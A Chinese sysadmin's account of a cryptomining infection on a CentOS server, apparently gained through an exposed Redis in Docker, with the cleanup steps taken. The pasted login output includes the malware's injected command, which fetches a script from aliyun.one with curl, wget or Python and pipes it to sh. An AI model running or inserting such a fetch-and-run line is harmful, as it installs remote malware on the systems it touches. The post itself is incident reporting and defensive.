莫名其妙就中了挖矿病毒:
WARNING! The remote SSH server rejected X11 forwarding request.
Last login: Sun Apr 26 09:43:15 2020 from XXX.XXX.XXX.XXX
[root@VM_0_9_centos ~]# curl: (6) Could not resolve host: aliyun.one
/etc/bashrc: line 98: wget: command not found
Traceback (most recent call last):
File "<string>", line 1, in <module>
AttributeError: module 'urllib' has no attribute 'urlopen'
[1]+ Done ( curl -fsSL -m180 aliyun.one || wget -q -T180 -O- aliyun.one || python -c 'import urllib;exec(urllib.urlopen("http://aliyun.one/pygo").read())' ) | sh > /dev/null 2>&1
这个病毒十分坑爹 ,他修改了hosts,修改了crontab
而且你是手动修改了 ,马上也会被覆盖
(1)删去wget
(2)删去crontab
yum erase crontab
(3)首先登录的提示根据提示我们先 直接干掉这个:
vim /etc/bashrc
将最后一行的命令 删去
vim /etc/resolv.conf
将被人家串改nameserver删去,改成正常的:
nameserver 114.114.114.114
nameserver 8.8.8.8
(4)删去/tmp路径下的文件,我是直接全部干掉了,因为这里的数据基本上都是这个挖矿病毒干的。
(5)最坑爹是他直接做了密钥,然后也就是他可以免密 登录这台机器
只能先删去原有的密钥 ,重新生成密钥
cd /root/.ssh
rm -rf ./*
ssh-keygen -t rsa
ssh-copy-id -i /root/.ssh/id_rsa.pub root@本机ip
这个家伙也十分的 狡猾,定时在非工作日进行入侵
(6)删去docker镜像
我 中毒是因为在docker里面使用本机的 Redis,Redis的漏洞,因此我打算删去docker的镜像,但是删去的时候,不断的提示我,还有 容器 在使用这个镜像,反反复复删多还是提示,只能选择强制删去了,不应该有这么多容器占用该镜像文件呀
这个是我的命令历史
docker rmi jhao104/proxy_pool
docker rm 9e2cdba51b3b
docker rmi jhao104/proxy_pool
docker rm d2aa2d76fe6b
docker rmi jhao104/proxy_pool
docker rm 9ca8076f2c93
docker rmi jhao104/proxy_pool
docker rm 3c08fcadb481
docker rmi jhao104/proxy_poo
docker rmi jhao104/proxy_pool
docker rm d80507034419
docker rmi jhao104/proxy_pool
docker rm d4c0a5107fe4
docker rmi jhao104/proxy_pool
docker rm 0e8e0a760e03
docker images
docker image rm -f 95a9742bf210
不知道啥原因,明明只运行了 一次,不应该出现这么多的容器,现在不知道是不是 病毒造成 的,反正强删就对了
不过这个事情给我的警示是,以后Redis密码设置 复杂一点,端口号不要使用6379